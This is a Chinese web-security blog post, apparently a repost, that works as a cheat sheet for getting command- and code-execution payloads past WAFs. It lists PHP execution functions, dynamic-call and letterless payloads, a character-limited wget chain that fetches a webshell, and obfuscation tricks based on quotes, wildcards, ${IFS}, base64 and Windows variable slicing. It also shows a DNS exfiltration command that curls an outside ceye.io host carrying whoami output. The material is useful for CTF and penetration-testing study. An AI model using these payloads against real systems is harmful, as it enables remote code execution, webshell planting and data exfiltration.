码迷,mamicode.com
首页 > Web开发 > 详细

[web安全]命令执行&&代码执行 wafpass总结

时间:2021-01-06 11:40:50      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:vim   通配符   的区别   base   oca   exec   creat   replace   系统命令   

命令执行&&代码执行 wafpass总结

代码执行

  1. php常见命令执行函数

     php代码
     	eval()
     	assert()
     	preg_replace
     	call_user_func()
     	call_user_func_array()
     	create_function
     	array_map()
     系统命令代码
     	system()
     	passthru()
     	exec()
     	pcntl_exec()
    	shell_exec()
     	popen()
     	proc_open()
        ``
        ob_start()
    
  2. php的动态执行

    cmd=$_GET[func]($_GET[shell])&func=system&shell=cat flag
    $e=‘sys‘.‘tem‘;$e(‘cat flag‘);
    
  3. disable_function绕过

    1.ld_preload
    2.php_gc
    
  4. 无字母getshell

    取反~?code=(~%8f%97%8f%96%91%99%90)()//phpinfo()
    
  5. 限制输入字符数

    >wget\>域名.\>com\>-O\>she\>ll.p\>p
    ls -t>a
    sh a
    

命令执行

  • linux中有查看功能的命令

    cat、tac、more、less、head、tail、nl、
    sed、sort、uniq、rev、vi、vim、od(以二进制的方式读取档案内容)
    
  • windows

    1. windows下 “和^和()不会影响命令执行
    2.切割字符 %a:~0,3% 代表变量a 0-3个字符
    eg.  
    set a=asdfghj 
    who$a:~0,1%mi <=> whoami
    
  • 通配符

    linux windows
    常见:
    * :0-多 
    ? :1
    [abc] :abc 
    [a-c] :abc
    [^abc]:没有abc
    来了:
    cat f[abc]lag
    cat f[a-z]lag
    cat fla*
    
  • 字符拼接

    双引号:"w"h"o"a"m"i   		    linux windows
    单引号: ‘w‘ho‘am‘i				linux
    反斜杠\: who\ami cat\flag 		linux
    重定向: cat<>flag cat<flag 	linux
    大括号: {cat,flag}				linux
    变量:	a=l;b=s;$a$b;			 linux
    变量:set a=di&&set b=r&& %a%%b% windows
    骚操作: 
    1.	666`whoami`666  => bash: 666root666:未找到命令
    2.	who`asd`am`sss`i => 
    bash: ssd:未找到命令
    bash: sss:未找到命令
    root
    
  • 变量

    保留变量名 无意义变量$+123456789	${IFS} ${IFS}$9 	
    cat${IFS}flag		linux
    
  • 编码

    echo d2hvYW1pCg== | base64 -d //执行whoami  -d 意思是decode  linux
    windows可以使用powershell base64
    
  • &,&&,|,||在windows和linux中的区别

    &	linux:后台运行 windows: 1 2 同时执行
    1&&2	linux windows:1无错误运行2
    |	linux windows:上一条命令的输出,作为下一条命令参数(输入)
    1||2	linux windows:1有错误运行2
    
  • 一句话反弹shel

    linux各种一句话反弹shell总结

    Windows下反弹shell的方法

  • DNS

    
    curl xxxx.ceye.io/`whoami`
    
  • 借他文之手来获取字符

    借助已有的字符进行拼接
    
  • 利用Linux的环境变量

    echo ${PATH}   => 	/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    echo ${PATH:1:1} =>	u
    

[web安全]命令执行&&代码执行 wafpass总结

标签:vim   通配符   的区别   base   oca   exec   creat   replace   系统命令   

原文地址:https://www.cnblogs.com/Ky1226/p/14223718.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!